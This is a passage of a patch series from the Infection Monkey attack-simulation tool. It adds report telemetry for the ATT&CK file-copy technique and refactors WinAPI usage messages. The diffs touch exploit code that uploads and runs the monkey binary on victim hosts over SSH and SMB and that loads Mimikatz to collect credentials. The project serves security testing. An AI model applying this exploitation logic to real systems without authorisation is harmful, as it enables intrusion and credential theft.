id: 'srcMachine', accessor: x => x.src, style: { 'whiteSpace': 'unset'}, width: 170 }, + {Header: 'Dst. Machine', id: 'dstMachine', accessor: x => x.dst, style: { 'whiteSpace': 'unset'}, width: 170}, + {Header: 'Filename', id: 'filename', accessor: x => x.filename, style: { 'whiteSpace': 'unset'}}, + ] + }])}; + + render() { + return ( +
+
{this.props.data.message}
+
+ {this.props.data.status !== 'UNSCANNED' ? + : ""} +
+ ); + } +} + +export default T1105; diff --git a/monkey/monkey_island/cc/ui/src/components/report-components/AttackReport.js b/monkey/monkey_island/cc/ui/src/components/report-components/AttackReport.js index 348510175..6a9c1832c 100644 --- a/monkey/monkey_island/cc/ui/src/components/report-components/AttackReport.js +++ b/monkey/monkey_island/cc/ui/src/components/report-components/AttackReport.js @@ -14,6 +14,7 @@ import T1059 from "../attack/techniques/T1059"; import T1086 from "../attack/techniques/T1086"; import T1082 from "../attack/techniques/T1082"; import T1145 from "../attack/techniques/T1145"; +import T1105 from "../attack/techniques/T1105"; const tech_components = { 'T1210': T1210, @@ -24,7 +25,8 @@ const tech_components = { 'T1059': T1059, 'T1086': T1086, 'T1082': T1082, - 'T1145': T1145 + 'T1145': T1145, + 'T1105': T1105 }; const classNames = require('classnames'); From eb574c8fffcde4b3fbfc2af9a228b6dfc5a77276 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Tue, 9 Jul 2019 09:49:29 +0300 Subject: [PATCH 3/6] Minor changes in the UI --- .../cc/ui/src/components/attack/techniques/T1105.js | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js index 3f0438245..ed0ebc1e9 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js @@ -1,7 +1,7 @@ import React from 'react'; import '../../../styles/Collapse.scss' import ReactTable from "react-table"; -import { renderMachineFromSystemData } from "./Helpers" +import { scanStatus } from "./Helpers" class T1105 extends React.Component { @@ -25,7 +25,7 @@ class T1105 extends React.Component {
{this.props.data.message}

- {this.props.data.status !== 'UNSCANNED' ? + {this.props.data.status !== scanStatus.UNSCANNED ? Date: Thu, 1 Aug 2019 14:52:27 +0300 Subject: [PATCH 4/6] Fixed code duplication in T1105 sending and typo in report header --- monkey/infection_monkey/exploit/sshexec.py | 17 +++++++++-------- .../post_breach/actions/users_custom_pba.py | 17 +++++++++++------ .../src/components/attack/techniques/T1105.js | 2 +- 3 files changed, 21 insertions(+), 15 deletions(-) diff --git a/monkey/infection_monkey/exploit/sshexec.py b/monkey/infection_monkey/exploit/sshexec.py index 2c56471a4..78e51f875 100644 --- a/monkey/infection_monkey/exploit/sshexec.py +++ b/monkey/infection_monkey/exploit/sshexec.py @@ -164,19 +164,20 @@ class SSHExploiter(HostExploiter): ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path), callback=self.log_transfer) ftp.chmod(self._config.dropper_target_path_linux, 0o777) - T1105Telem(ScanStatus.USED, - get_interface_to_target(self.host.ip_addr[0]), - self.host.ip_addr[0], - src_path).send() + status = ScanStatus.USED ftp.close() except Exception as exc: LOG.debug("Error uploading file into victim %r: (%s)", self.host, exc) - T1105Telem(ScanStatus.SCANNED, - get_interface_to_target(self.host.ip_addr[0]), - self.host.ip_addr[0], - src_path).send() + status = ScanStatus.SCANNED + + T1105Telem(status, + get_interface_to_target(self.host.ip_addr[0]), + self.host.ip_addr[0], + src_path).send() + if status == ScanStatus.SCANNED: return False + try: cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG) cmdline += build_monkey_commandline(self.host, get_monkey_depth() - 1) diff --git a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py index d923cb60e..a388813ab 100644 --- a/monkey/infection_monkey/post_breach/actions/users_custom_pba.py +++ b/monkey/infection_monkey/post_breach/actions/users_custom_pba.py @@ -82,17 +82,22 @@ class UsersPBA(PBA): pba_file_contents = ControlClient.get_pba_file(filename) + status = None if not pba_file_contents or not pba_file_contents.content: LOG.error("Island didn't respond with post breach file.") - T1105Telem(ScanStatus.SCANNED, - WormConfiguration.current_server.split(':')[0], - get_interface_to_target(WormConfiguration.current_server.split(':')[0]), - filename).send() - return False - T1105Telem(ScanStatus.USED, + status = ScanStatus.SCANNED + + if not status: + status = ScanStatus.USED + + T1105Telem(status, WormConfiguration.current_server.split(':')[0], get_interface_to_target(WormConfiguration.current_server.split(':')[0]), filename).send() + + if status == ScanStatus.SCANNED: + return False + try: with open(os.path.join(dst_dir, filename), 'wb') as written_PBA_file: written_PBA_file.write(pba_file_contents.content) diff --git a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js index ed0ebc1e9..afe9003b3 100644 --- a/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js +++ b/monkey/monkey_island/cc/ui/src/components/attack/techniques/T1105.js @@ -12,7 +12,7 @@ class T1105 extends React.Component { static getFilesColumns() { return ([{ - Header: 'Files copied.', + Header: 'Files copied', columns: [ {Header: 'Src. Machine', id: 'srcMachine', accessor: x => x.src, style: { 'whiteSpace': 'unset'}, width: 170 }, {Header: 'Dst. Machine', id: 'dstMachine', accessor: x => x.dst, style: { 'whiteSpace': 'unset'}, width: 170}, From ee1d6507b044ef4ff9cbff764a8bf610b60c3ed3 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 1 Aug 2019 17:39:53 +0300 Subject: [PATCH 5/6] Refactored T1106 to use Usage enum and fixed SMB bugs --- monkey/common/utils/attack_utils.py | 6 ++++++ monkey/infection_monkey/dropper.py | 5 ++--- monkey/infection_monkey/exploit/sambacry.py | 4 ++-- monkey/infection_monkey/exploit/tools/helpers.py | 1 + .../infection_monkey/exploit/tools/smb_tools.py | 8 ++++---- .../system_info/mimikatz_collector.py | 3 +-- monkey/infection_monkey/system_singleton.py | 15 +++++++++------ .../telemetry/attack/t1106_telem.py | 2 +- 8 files changed, 26 insertions(+), 18 deletions(-) diff --git a/monkey/common/utils/attack_utils.py b/monkey/common/utils/attack_utils.py index 3edb0dc28..23b7e078c 100644 --- a/monkey/common/utils/attack_utils.py +++ b/monkey/common/utils/attack_utils.py @@ -15,6 +15,12 @@ class UsageEnum(Enum): ScanStatus.SCANNED.value: "SMB exploiter failed to run the monkey by creating a service via MS-SCMR."} MIMIKATZ = {ScanStatus.USED.value: "Windows module loader was used to load Mimikatz DLL.", ScanStatus.SCANNED.value: "Monkey tried to load Mimikatz DLL, but failed."} + MIMIKATZ_FILE_COPY = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.", + ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz, but failed."} + SINGLETON_FILE_COPY = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.", + ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton" + " for monkey process wasn't successful."} + DROPPER_FILE_COPY = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."} # Dict that describes what BITS job was used for diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index 6bd9dab84..6b8e969c0 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -15,7 +15,7 @@ from infection_monkey.exploit.tools.helpers import build_monkey_commandline_expl from infection_monkey.model import MONKEY_CMDLINE_WINDOWS, MONKEY_CMDLINE_LINUX, GENERAL_CMDLINE_LINUX from infection_monkey.system_info import SystemInfoCollector, OperatingSystem from infection_monkey.telemetry.attack.t1106_telem import T1106Telem -from common.utils.attack_utils import ScanStatus +from common.utils.attack_utils import ScanStatus, UsageEnum if "win32" == sys.platform: from win32process import DETACHED_PROCESS @@ -158,7 +158,6 @@ class MonkeyDrops(object): else: LOG.debug("Dropper source file '%s' is marked for deletion on next boot", self._config['source_path']) - T1106Telem(ScanStatus.USED, "WinAPI was used to mark monkey files" - " for deletion on next boot.").send() + T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_FILE_COPY).send() except AttributeError: LOG.error("Invalid configuration options. Failing") diff --git a/monkey/infection_monkey/exploit/sambacry.py b/monkey/infection_monkey/exploit/sambacry.py index 23d89bfa5..762cc14b5 100644 --- a/monkey/infection_monkey/exploit/sambacry.py +++ b/monkey/infection_monkey/exploit/sambacry.py @@ -270,8 +270,8 @@ class SambaCryExploiter(HostExploiter): with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file: smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read) T1105Telem(ScanStatus.USED, - get_interface_to_target(self.host.ip_addr[0]), - self.host.ip_addr[0], + get_interface_to_target(self.host.ip_addr), + self.host.ip_addr, monkey_bin_64_src_path).send() smb_client.disconnectTree(tree_id) diff --git a/monkey/infection_monkey/exploit/tools/helpers.py b/monkey/infection_monkey/exploit/tools/helpers.py index 83a8bfd92..bc74128e2 100644 --- a/monkey/infection_monkey/exploit/tools/helpers.py +++ b/monkey/infection_monkey/exploit/tools/helpers.py @@ -19,6 +19,7 @@ def get_interface_to_target(dst): s.connect((dst, 1)) ip_to_dst = s.getsockname()[0] except KeyError: + LOG.debug("Couldn't get an interface to the target, presuming that target is localhost.") ip_to_dst = '127.0.0.1' finally: s.close() diff --git a/monkey/infection_monkey/exploit/tools/smb_tools.py b/monkey/infection_monkey/exploit/tools/smb_tools.py index af088d9eb..6ca0b63ad 100644 --- a/monkey/infection_monkey/exploit/tools/smb_tools.py +++ b/monkey/infection_monkey/exploit/tools/smb_tools.py @@ -140,8 +140,8 @@ class SmbTools(object): file_uploaded = True T1105Telem(ScanStatus.USED, - get_interface_to_target(host.ip_addr[0]), - host.ip_addr[0], + get_interface_to_target(host.ip_addr), + host.ip_addr, dst_path).send() LOG.info("Copied monkey file '%s' to remote share '%s' [%s] on victim %r", src_path, share_name, share_path, host) @@ -151,8 +151,8 @@ class SmbTools(object): LOG.debug("Error uploading monkey to share '%s' on victim %r: %s", share_name, host, exc) T1105Telem(ScanStatus.SCANNED, - get_interface_to_target(host.ip_addr[0]), - host.ip_addr[0], + get_interface_to_target(host.ip_addr), + host.ip_addr, dst_path).send() continue finally: diff --git a/monkey/infection_monkey/system_info/mimikatz_collector.py b/monkey/infection_monkey/system_info/mimikatz_collector.py index d878bcb34..c0632a09e 100644 --- a/monkey/infection_monkey/system_info/mimikatz_collector.py +++ b/monkey/infection_monkey/system_info/mimikatz_collector.py @@ -47,7 +47,6 @@ class MimikatzCollector(object): collect_proto = ctypes.WINFUNCTYPE(ctypes.c_int) get_proto = ctypes.WINFUNCTYPE(MimikatzCollector.LogonData) get_text_output_proto = ctypes.WINFUNCTYPE(ctypes.c_wchar_p) - T1106Telem(ScanStatus.USED, "WinAPI was called to load mimikatz.").send() self._collect = collect_proto(("collect", self._dll)) self._get = get_proto(("get", self._dll)) self._get_text_output_proto = get_text_output_proto(("getTextOutput", self._dll)) @@ -57,7 +56,7 @@ class MimikatzCollector(object): LOG.exception("Error initializing mimikatz collector") status = ScanStatus.SCANNED T1129Telem(status, UsageEnum.MIMIKATZ).send() - T1106Telem(ScanStatus.SCANNED, "Monkey tried to call WinAPI to load mimikatz.").send() + T1106Telem(status, UsageEnum.MIMIKATZ_FILE_COPY).send() def get_logon_info(self): """ diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py index 06a2ea689..a1c8762cd 100644 --- a/monkey/infection_monkey/system_singleton.py +++ b/monkey/infection_monkey/system_singleton.py @@ -5,7 +5,7 @@ from abc import ABCMeta, abstractmethod from infection_monkey.config import WormConfiguration from infection_monkey.telemetry.attack.t1106_telem import T1106Telem -from common.utils.attack_utils import ScanStatus +from common.utils.attack_utils import ScanStatus, UsageEnum __author__ = 'itamar' @@ -45,22 +45,25 @@ class WindowsSystemSingleton(_SystemSingleton): ctypes.c_bool(True), ctypes.c_char_p(self._mutex_name)) last_error = ctypes.windll.kernel32.GetLastError() + + status = None if not handle: LOG.error("Cannot acquire system singleton %r, unknown error %d", self._mutex_name, last_error) - T1106Telem(ScanStatus.SCANNED, "WinAPI call to acquire system singleton " - "for monkey process wasn't successful.").send() - - return False + status = ScanStatus.SCANNED if winerror.ERROR_ALREADY_EXISTS == last_error: + status = ScanStatus.SCANNED LOG.debug("Cannot acquire system singleton %r, mutex already exist", self._mutex_name) + if not status: + status = ScanStatus.USED + T1106Telem(status, UsageEnum.SINGLETON_FILE_COPY).send() + if status == ScanStatus.SCANNED: return False self._mutex_handle = handle - T1106Telem(ScanStatus.USED, "WinAPI was called to acquire system singleton for monkey's process.").send() LOG.debug("Global singleton mutex %r acquired", self._mutex_name) diff --git a/monkey/infection_monkey/telemetry/attack/t1106_telem.py b/monkey/infection_monkey/telemetry/attack/t1106_telem.py index 30cad6072..255145da8 100644 --- a/monkey/infection_monkey/telemetry/attack/t1106_telem.py +++ b/monkey/infection_monkey/telemetry/attack/t1106_telem.py @@ -6,6 +6,6 @@ class T1106Telem(UsageTelem): """ T1129 telemetry. :param status: ScanStatus of technique - :param usage: Usage string + :param usage: UsageEnum type value """ super(T1106Telem, self).__init__("T1106", status, usage) From 7eab8687c1d5d926d757696f5cd127991d2d867b Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 19 Aug 2019 09:16:14 +0300 Subject: [PATCH 6/6] Fixed bug created during merge, fixed typos in attack telemetries for usage. --- monkey/common/utils/attack_utils.py | 10 ++++------ monkey/infection_monkey/dropper.py | 2 +- .../infection_monkey/system_info/mimikatz_collector.py | 2 +- monkey/infection_monkey/system_singleton.py | 2 +- .../infection_monkey/telemetry/attack/usage_telem.py | 4 ++-- 5 files changed, 9 insertions(+), 11 deletions(-) diff --git a/monkey/common/utils/attack_utils.py b/monkey/common/utils/attack_utils.py index ac3f2f66b..708bc8f3c 100644 --- a/monkey/common/utils/attack_utils.py +++ b/monkey/common/utils/attack_utils.py @@ -18,12 +18,10 @@ class UsageEnum(Enum): MIMIKATZ_WINAPI = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.", ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz."} DROPPER = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."} - MIMIKATZ_FILE_COPY = {ScanStatus.USED.value: "WinAPI was called to load mimikatz.", - ScanStatus.SCANNED.value: "Monkey tried to call WinAPI to load mimikatz, but failed."} - SINGLETON_FILE_COPY = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.", - ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton" - " for monkey process wasn't successful."} - DROPPER_FILE_COPY = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."} + SINGLETON_WINAPI = {ScanStatus.USED.value: "WinAPI was called to acquire system singleton for monkey's process.", + ScanStatus.SCANNED.value: "WinAPI call to acquire system singleton" + " for monkey process wasn't successful."} + DROPPER_WINAPI = {ScanStatus.USED.value: "WinAPI was used to mark monkey files for deletion on next boot."} # Dict that describes what BITS job was used for diff --git a/monkey/infection_monkey/dropper.py b/monkey/infection_monkey/dropper.py index 6b8e969c0..7c576fc30 100644 --- a/monkey/infection_monkey/dropper.py +++ b/monkey/infection_monkey/dropper.py @@ -158,6 +158,6 @@ class MonkeyDrops(object): else: LOG.debug("Dropper source file '%s' is marked for deletion on next boot", self._config['source_path']) - T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_FILE_COPY).send() + T1106Telem(ScanStatus.USED, UsageEnum.DROPPER_WINAPI).send() except AttributeError: LOG.error("Invalid configuration options. Failing") diff --git a/monkey/infection_monkey/system_info/mimikatz_collector.py b/monkey/infection_monkey/system_info/mimikatz_collector.py index c0632a09e..2951b7ebc 100644 --- a/monkey/infection_monkey/system_info/mimikatz_collector.py +++ b/monkey/infection_monkey/system_info/mimikatz_collector.py @@ -55,8 +55,8 @@ class MimikatzCollector(object): except Exception: LOG.exception("Error initializing mimikatz collector") status = ScanStatus.SCANNED + T1106Telem(status, UsageEnum.MIMIKATZ_WINAPI).send() T1129Telem(status, UsageEnum.MIMIKATZ).send() - T1106Telem(status, UsageEnum.MIMIKATZ_FILE_COPY).send() def get_logon_info(self): """ diff --git a/monkey/infection_monkey/system_singleton.py b/monkey/infection_monkey/system_singleton.py index a1c8762cd..50fa6363b 100644 --- a/monkey/infection_monkey/system_singleton.py +++ b/monkey/infection_monkey/system_singleton.py @@ -59,7 +59,7 @@ class WindowsSystemSingleton(_SystemSingleton): if not status: status = ScanStatus.USED - T1106Telem(status, UsageEnum.SINGLETON_FILE_COPY).send() + T1106Telem(status, UsageEnum.SINGLETON_WINAPI).send() if status == ScanStatus.SCANNED: return False diff --git a/monkey/infection_monkey/telemetry/attack/usage_telem.py b/monkey/infection_monkey/telemetry/attack/usage_telem.py index 4b47d8be3..2d7cb548e 100644 --- a/monkey/infection_monkey/telemetry/attack/usage_telem.py +++ b/monkey/infection_monkey/telemetry/attack/usage_telem.py @@ -7,10 +7,10 @@ class UsageTelem(AttackTelem): """ :param technique: Id of technique :param status: ScanStatus of technique - :param usage: Enum of UsageEnum type + :param usage: Usage string """ super(UsageTelem, self).__init__(technique, status) - self.usage = usage.name + self.usage = usage def get_data(self): data = super(UsageTelem, self).get_data()